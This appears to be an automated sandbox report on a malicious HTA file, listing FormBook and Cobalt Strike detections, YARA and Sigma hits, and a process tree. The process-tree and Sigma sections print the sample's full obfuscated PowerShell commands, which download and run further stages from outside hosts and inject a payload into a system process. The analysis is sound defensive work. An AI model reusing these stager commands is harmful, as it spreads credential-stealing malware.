Edit tour

Windows Analysis Report
seemebestthingsgivenmegood.hta

Overview

General Information

Sample name:	seemebestthingsgivenmegood.hta
Analysis ID:	1566423
MD5:	51d8ef6ebcd710802189071e5ad9f154
SHA1:	3d0178a66a7ed8fb3b53c7b85ea447043ed51ac3
SHA256:	66a1e9b4e372b5040f6cd336d1bc57381b4486e56c4b0e114819b49514b21a20
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook, HTMLPhisher

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Cobalt Strike Beacon

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected FormBook

Yara detected HtmlPhish44

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

AI detected suspicious sample

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

PowerShell case anomaly found

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious execution chain found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7544 cmdline: mshta.exe "C:\Users\user\Desktop\seemebestthingsgivenmegood.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 7652 cmdline: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7704 cmdline: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 7936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rll3hpdk\rll3hpdk.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 7964 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE7FE.tmp" "c:\Users\user\AppData\Local\Temp\rll3hpdk\CSC65BF9AAB75645B3826CB5BF8CE44730.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

wscript.exe (PID: 3048 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" MD5: FF00E0480075B095948000BDC66E81F0)

powershell.exe (PID: 3520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_compiler.exe (PID: 7936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
seemebestthingsgivenmegood.hta	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.1651008436.0000000000FE0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13fdf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000010.00000002.1650098652.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: powershell.exe PID: 3520	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: powershell.exe PID: 3520	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x11834:$b2: ::FromBase64String( 0x1274f:$b2: ::FromBase64String( 0x17cb2:$b2: ::FromBase64String( 0x183c4:$b2: ::FromBase64String( 0x1b014:$b2: ::FromBase64String( 0x1b726:$b2: ::FromBase64String( 0x4b0692:$b2: ::FromBase64String( 0x4b0da4:$b2: ::FromBase64String( 0x4c89cf:$b2: ::FromBase64String( 0x528777:$b2: ::FromBase64String( 0x53091f:$b2: ::FromBase64String( 0x54d7f4:$b2: ::FromBase64String( 0x5725b1:$b2: ::FromBase64String( 0x572619:$b2: ::FromBase64String( 0x65c30c:$b2: ::FromBase64String( 0x11813:$b3: ::UTF8.GetString( 0x1272e:$b3: ::UTF8.GetString( 0x17c91:$b3: ::UTF8.GetString( 0x183a3:$b3: ::UTF8.GetString( 0x1aff3:$b3: ::UTF8.GetString( 0x1b705:$b3: ::UTF8.GetString(
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
16.2.aspnet_compiler.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
16.2.aspnet_compiler.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e403:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x164b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
16.2.aspnet_compiler.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
16.2.aspnet_compiler.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f203:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x172b2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Other

Source	Rule	Description	Author	Strings
amsi32_3520.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
amsi32_3520.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbW9sZGluYSk7JG9jZWFub2xvZ2lzdGEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRyYWJpc2FsdG9uYSk7JGFscGlyY2hlID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGFscGlyY2hlLkludm9rZSgkbnVsbCwgQCgndHh0LkFaUkhIQVovMTMyLzAwMi4zMTEuMDcuNjQxLy86cHR0aCcsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICckcmVzc3VwaW5hcicsICdhc3BuZXRfY29tcGlsZXInLCAnJHJlc3N1cGluYXInLCAnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnJHJlc3N1cGluYXInLCckcmVzc3VwaW5hcicsJyRyZXNzdXBpbmFyJywnMScsJyRyZXNzdXBpbmFyJykpOw==';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = 'JGlkaW9lbGVjdHJpY2lkYWRlID0gJ2h0dHBzOi8vMTAxNi5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9SFRVR19FeXJ1RFIwT0FaSDBISEp5ZXBVclhTdkZfaTZqOGJ3ZVRlV0JDdTE5eGNialFONVRrc2E0T0cwTXFjY3FXTkxsZyZwa192aWQ9ZTAxMDk2MzhjOWJmYjk1NzE3MzI3OTQzNTZhMWZmNmMgJzskdXJ1Z3VhaW8gPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRlbmNlZmFsYXJ0byA9ICR1cnVndWFpby5Eb3dubG9hZERhdGEoJGlkaW9lbGVjdHJpY2lkYWRlKTskaHltZW5vdG9taWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkZW5jZWZhbGFydG8pOyRpbnRlcm1pYXIgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGNvcGlvc2FtZW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyYXNsYWRhciA9ICRoeW1lbm90b21pYS5JbmRleE9mKCRpbnRlcm1pYXIpOyRyZXNwb25kb25hID0gJGh5bWVub3RvbWlhLkluZGV4T2YoJGNvcGlvc2FtZW50ZSk7JHRyYXNsYWRhciAtZ2UgMCAtYW5kICRyZXNwb25kb25hIC1ndCAkdHJhc2xhZGFyOyR0cmFzbGFkYXIgKz0gJGludGVybWlhci5MZW5ndGg7JGVtcGVsaWNhciA9ICRyZXNwb25kb25hIC0gJHRyYXNsYWRhcjskdW5ndWlmb3JtZSA9ICRoeW1lbm90b21pYS5TdWJzdHJpbmcoJHRyYXNsYWRhciwgJGVtcGVsaWNhcik7JG1vbGRpbmEgPSAtam9pbiAoJHVuZ3VpZm9ybWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHVuZ3VpZm9ybWUuTGVuZ3RoKV07JHJhYmlzYWx0b25hID0gW1N5c3Rlb

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7704, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS" , ProcessId: 3048, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; 